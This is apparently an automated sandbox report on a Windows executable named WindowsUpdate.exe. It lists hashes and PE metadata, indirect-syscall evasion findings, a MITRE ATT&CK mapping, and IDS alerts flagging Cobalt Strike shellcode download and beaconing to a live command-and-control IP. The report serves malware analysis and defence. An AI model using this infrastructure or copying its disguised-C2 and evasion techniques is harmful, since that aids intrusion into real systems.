Source: WindowsUpdate.exe, 00000000.00000003.2428004046.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770010000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/r
Source: WindowsUpdate.exe, 00000000.00000003.2579208487.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.000002176FFBE000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279771257.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/res/js/jquery-3.6.2.slim.min.js
Source: WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/res/js/jquery-3.6.2.slim.min.jsG
Source: WindowsUpdate.exe, 00000000.00000003.2579208487.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.000002176FFBE000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279771257.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/res/js/jquery-3.6.2.slim.min.jsw
Source: WindowsUpdate.exe, 00000000.00000003.2869526732.0000021770010000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/ssets/code-3d7b701fc6eb.cssC4
Source: WindowsUpdate.exe, 00000000.00000003.2279686684.0000021770010000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://146.56.219.146/ssets/code-3d7b701fc6eb.cssq4
Source: unknown | HTTPS traffic detected: 146.56.219.146:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Code function: 0_2_00007FF7300A1190 NtCreateThreadEx, NtQueueApcThread, NtResumeThread, NtProtectVirtualMemory, NtProtectVirtualMemory | 0_2_00007FF7300A1190
Source: classification engine | Classification label: mal64.evad.winEXE@1/0@0/1
Source: WindowsUpdate.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: WindowsUpdate.exe | ReversingLabs: Detection: 13%
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: chakra.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: WindowsUpdate.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: WindowsUpdate.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: WindowsUpdate.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: WindowsUpdate.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: WindowsUpdate.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: WindowsUpdate.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: WindowsUpdate.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: WindowsUpdate.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\admin\Desktop\Ulfberht-main\Ulfberht-main\src\x64\Release\Ulfberht.pdb | source: WindowsUpdate.exe
Source: WindowsUpdate.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: WindowsUpdate.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: WindowsUpdate.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: WindowsUpdate.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: WindowsUpdate.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\WindowsUpdate.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: WindowsUpdate.exe, 00000000.00000003.2579208487.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.000002176FFBE000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279771257.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.000002176FFBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW yp
Source: WindowsUpdate.exe, 00000000.00000003.2279771257.0000021770003000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770003000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.0000021770003000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.0000021770003000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.0000021770003000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2579208487.0000021770003000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.0000021770003000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Code function: 0_2_00007FF7300A21A8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7300A21A8
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Code function: 0_2_00007FF7300A2350 SetUnhandledExceptionFilter,0_2_00007FF7300A2350
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Code function: 0_2_00007FF7300A1CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7300A1CB4

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\WindowsUpdate.exe | NtProtectVirtualMemory: Indirect: 0x7FF7300A15CF
Source: C:\Users\user\Desktop\WindowsUpdate.exe | NtResumeThread: Indirect: 0x7FF7300A1409
Source: C:\Users\user\Desktop\WindowsUpdate.exe | NtQueueApcThread: Indirect: 0x7FF7300A13BA
Source: C:\Users\user\Desktop\WindowsUpdate.exe | NtCreateThreadEx: Indirect: 0x7FF7300A1382
Source: C:\Users\user\Desktop\WindowsUpdate.exe | NtProtectVirtualMemory: Indirect: 0x7FF7300A1492
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Code function: 0_2_00007FF7300A2080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7300A2080
Source: C:\Users\user\Desktop\WindowsUpdate.exe | Code function: 0_2_00000217700AB050 GetUserNameA,0_2_00000217700AB050
MITRE ATT&CK Matrix (listed per tactic column; a number in parentheses is the count shown beside that technique in the original matrix, i.e. techniques with matching signatures)

  • Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
  • Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
  • Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
  • Execution: Windows Management Instrumentation, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
  • Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
  • Privilege Escalation: Abuse Elevation Control Mechanism (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
  • Defense Evasion: Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (2), DLL Side-Loading (1), Binary Padding, Software Packing, Steganography
  • Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
  • Discovery: System Time Discovery (1), Query Registry (1), Security Software Discovery (11), Account Discovery (1), System Owner/User Discovery (1), System Information Discovery (2)
  • Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
  • Collection: Archive Collected Data (11), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
  • Command and Control: Encrypted Channel (11), Ingress Tool Transfer (1), Non-Application Layer Protocol (1), Application Layer Protocol (12), Fallback Channels, Multiband Communication
  • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
  • Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop

Source | Detection | Scanner | Label | Link
WindowsUpdate.exe | 13% | ReversingLabs
No Antivirus matches
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
https://146.56.219.146/assets/code-3d7b701fc6eb.css | true | Avira URL Cloud: safe | unknown
https://146.56.219.146/res/js/jquery-3.6.2.slim.min.js | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
146.56.219.146 | unknown | China | 45090 | CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577955
Start date and time: 2024-12-18 22:51:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: WindowsUpdate.exe
Detection: MAL
Classification: mal64.evad.winEXE@1/0@0/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 79%
  • Number of executed functions: 7
  • Number of non-executed functions: 51
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed; the report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: WindowsUpdate.exe
No simulations
No context
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | la.bot.m68k.elf | malicious | Mirai | 123.206.102.25
CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | loligang.ppc.elf | malicious | Mirai | 111.231.39.16
CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | x86_64.nn.elf | malicious | Mirai, Okiru | 154.8.240.203
CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | sh4.nn.elf | malicious | Mirai, Okiru | 152.141.135.2
CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | arm.nn-20241218-0633.elf | malicious | Mirai, Okiru | 139.155.31.203
CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | 1.elf | malicious | Unknown | 212.129.243.181
CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | jew.mips.elf | malicious | Unknown | 188.131.185.115
CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | jew.mpsl.elf | malicious | Unknown | 106.54.63.220
CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | cd#U9988.exe | malicious | Unknown | 81.71.103.11
CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | i486.elf | malicious | Mirai | 150.158.255.169
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context
51c64c77e60f3980eea90869b68c58a8 | Hbq580QZAR.exe | malicious | Socks5Systemz | 146.56.219.146
51c64c77e60f3980eea90869b68c58a8 | steel.exe.2.exe | malicious | Socks5Systemz | 146.56.219.146
51c64c77e60f3980eea90869b68c58a8 | stories.exe.2.exe | malicious | Socks5Systemz | 146.56.219.146
51c64c77e60f3980eea90869b68c58a8 | basx.exe | malicious | Socks5Systemz | 146.56.219.146
51c64c77e60f3980eea90869b68c58a8 | list.exe | malicious | Socks5Systemz | 146.56.219.146
51c64c77e60f3980eea90869b68c58a8 | newwork.exe.1.exe | malicious | Socks5Systemz | 146.56.219.146
51c64c77e60f3980eea90869b68c58a8 | stail.exe.3.exe | malicious | Socks5Systemz | 146.56.219.146
51c64c77e60f3980eea90869b68c58a8 | steel.exe.3.exe | malicious | Socks5Systemz | 146.56.219.146
51c64c77e60f3980eea90869b68c58a8 | newwork.exe.1.exe | malicious | Socks5Systemz | 146.56.219.146
51c64c77e60f3980eea90869b68c58a8 | steel.exe.3.exe | malicious | Socks5Systemz | 146.56.219.146
No created / dropped files found
File type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 5.591432751472315
TrID:
  • Win64 Executable GUI (202006/5) 92.65%
  • Win64 Executable (generic) (12005/4) 5.51%
  • Generic Win/DOS Executable (2004/3) 0.92%
  • DOS Executable Generic (2002/1) 0.92%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: WindowsUpdate.exe
File size: 15'360 bytes
MD5: 375049ae392572882d3402d0678389ef
SHA1: a3534e4451f28d4162e2d39dd70ef7b4496d4807
SHA256: 7d598c046110849932052e38c67071473753e809cb5d55d2223226e810b1475a
SHA512: 5e37a2c009f43516f91ca4c0eef2bb7baea2392bd65005b183718ab2e9e5f07fa4d86e1b67abf0f6d3a49f1c228f0583fb4046167dbd84b0057778c0d0bf2a69
SSDEEP: 192:G3TQOAzI2rxNQPJ8+JeuB3GlM3Q5tfroKD14W18gi6a0H1IjHd:W2zQPJ8i5B3t3SD1t3m7d
TLSH: DD625D8ABDA705FEF1180675CD334F55D2BA7510076253C70391A1650EA36E1367F6CE
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m..j)..9)..9)..9 .q9#..9...8*..9...8:..9...8#..9...8*..9Y .8+..9)..9...90..8/..90..8(..90..9(..90..8(..9Rich)..9...............
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x140001ca0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x67613436 [Tue Dec 17 08:20:06 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 4ff98788b6fefb0963649625d2cc7416
Instruction
dec eax
sub esp, 28h
call 00007F89D095788Ch
dec eax
add esp, 28h
jmp 00007F89D0957327h
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
xor ecx, ecx
call dword ptr [0000135Bh]
dec eax
mov ecx, ebx
call dword ptr [0000134Ah]
call dword ptr [00001354h]
dec eax
mov ecx, eax
mov edx, C0000409h
dec eax
add esp, 20h
pop ebx
dec eax
jmp dword ptr [00001388h]
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 38h
mov ecx, 00000017h
call dword ptr [0000136Ch]
test eax, eax
je 00007F89D09574B9h
mov ecx, 00000002h
int 29h
dec eax
lea ecx, dword ptr [00002C72h]
call 00007F89D095755Eh
dec eax
mov eax, dword ptr [esp+38h]
dec eax
mov dword ptr [00002D59h], eax
dec eax
lea eax, dword ptr [esp+38h]
dec eax
add eax, 08h
dec eax
mov dword ptr [00002CE9h], eax
dec eax
mov eax, dword ptr [00002D42h]
dec eax
mov dword ptr [00002BB3h], eax
dec eax
mov eax, dword ptr [esp+40h]
dec eax
mov dword ptr [00002CB7h], eax
mov dword ptr [00002B8Dh], C0000409h
mov dword ptr [00002B87h], 00000001h
mov dword ptr [00002B91h], 00000001h
Programming Language:
  • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3944 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x5000 | 0x1b0 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7000 | 0x30 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x33f0 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x32b0 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3000 | 0x190 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x178c | 0x1800 | a06bc94cdb2a6f8da2a0159bf699f626 | False | 0.6280924479166666 | zlib compressed data | 6.284198941816348 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3000 | 0xfac | 0x1000 | 8b4abf84149e06006579064d111c9aaa | False | 0.389404296875 | data | 4.187288505810747 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4000 | 0xed8 | 0xa00 | fb11ec925ba45e5f452bc5e581aee40c | False | 0.524609375 | Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, numeric, rows 0, columns 0 | 4.134903482212727 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x5000 | 0x1b0 | 0x200 | deab9599a6751e2b06aba87c8c398346 | False | 0.49609375 | data | 3.262649438066295 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x6000 | 0x1e0 | 0x200 | d223c232889289f7388583adeff234e1 | False | 0.525390625 | data | 4.697597008251789 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7000 | 0x30 | 0x200 | 5baf708285fe24b733ca12b378119fa4 | False | 0.123046875 | data | 0.7128484083759542 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x6060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
VCRUNTIME140.dll | __current_exception_context, __current_exception, __C_specific_handler, memset, memcpy
api-ms-win-crt-runtime-l1-1-0.dll | terminate, _seh_filter_exe, _set_app_type, _initialize_onexit_table, _register_thread_local_exe_atexit_callback, _c_exit, _cexit, __p___argv, __p___argc, _crt_atexit, _exit, exit, _initterm_e, _initterm, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _register_onexit_function
api-ms-win-crt-math-l1-1-0.dll | __setusermatherr
api-ms-win-crt-stdio-l1-1-0.dll | __p__commode, _set_fmode
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
api-ms-win-crt-heap-l1-1-0.dll | _set_new_mode
KERNEL32.dll | GetCurrentThreadId, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, GetModuleHandleW, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, RtlCaptureContext, GetCurrentProcessId, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T22:52:03.210751+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49731 | 146.56.219.146 | 443 | TCP
2024-12-18T22:52:04.652742+0100 | 2035442 | ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1 | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49731 | TCP
2024-12-18T22:52:07.200084+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49732 | 146.56.219.146 | 443 | TCP
2024-12-18T22:52:07.947770+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49732 | TCP
2024-12-18T22:52:14.771106+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49733 | 146.56.219.146 | 443 | TCP
2024-12-18T22:52:15.525510+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49733 | TCP
2024-12-18T22:52:21.964454+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49736 | 146.56.219.146 | 443 | TCP
2024-12-18T22:52:22.696537+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49736 | TCP
2024-12-18T22:52:29.287463+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49741 | 146.56.219.146 | 443 | TCP
2024-12-18T22:52:30.023519+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49741 | TCP
2024-12-18T22:52:36.776166+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49742 | 146.56.219.146 | 443 | TCP
2024-12-18T22:52:37.532557+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49742 | TCP
2024-12-18T22:52:44.382950+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49743 | 146.56.219.146 | 443 | TCP
2024-12-18T22:52:45.142764+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49743 | TCP
2024-12-18T22:52:51.956452+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49744 | 146.56.219.146 | 443 | TCP
2024-12-18T22:52:52.708825+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49744 | TCP
2024-12-18T22:52:59.510929+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49746 | 146.56.219.146 | 443 | TCP
2024-12-18T22:53:00.248345+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49746 | TCP
2024-12-18T22:53:06.936853+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49763 | 146.56.219.146 | 443 | TCP
2024-12-18T22:53:07.673380+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49763 | TCP
2024-12-18T22:53:14.336190+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49779 | 146.56.219.146 | 443 | TCP
2024-12-18T22:53:15.082077+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49779 | TCP
